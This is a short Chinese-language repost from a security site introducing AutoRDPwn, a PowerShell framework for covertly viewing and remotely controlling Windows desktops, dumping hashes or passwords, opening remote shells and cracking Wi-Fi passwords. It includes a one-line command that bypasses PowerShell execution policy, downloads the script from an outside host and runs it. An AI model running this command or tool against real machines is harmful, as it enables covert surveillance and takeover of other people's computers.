标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2025-2357] 作者: hudie 发表于: [2019-04-12]
本文共 [362] 位读者顶过
今天给大家介绍的是一款名叫AutoRDPwn的隐蔽型渗透框架,实际上AutoRDPwn是一个PowerShell脚本,它可以实现对Windows设备的自动化攻击。这个漏洞【https://www.kitploit.com/search/label/Vulnerability】允许远程攻击者在用户毫不知情的情况下查看用户的桌面,甚至还可以通过恶意请求来实现桌面的远程控制。[出自:jiwo.org]
环境要求PowerShell4.0或更高版本。 新版本v 4.8增加的功能
工具使用这款应用程序可以直接在本地使用,也可以远程使用,或者是在两台设备间使用。在引入了额外功能模块之后,该工具甚至还可以导出哈希或密码,获取远程Shell,上传或下载文件,甚至是破解无线网络的密码以及恢复RDP连接历史记录等等。 一行命令即可执行powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfileAutoRDPwn.ps1 ; .\AutoRDPwn.ps1" ![]()
我们可以在程序的主菜单中查看和选择需要使用或加载的攻击模块:
工具的详细使用文档:【https://darkbyte.net/autordpwn-la-guia-definitiva】 |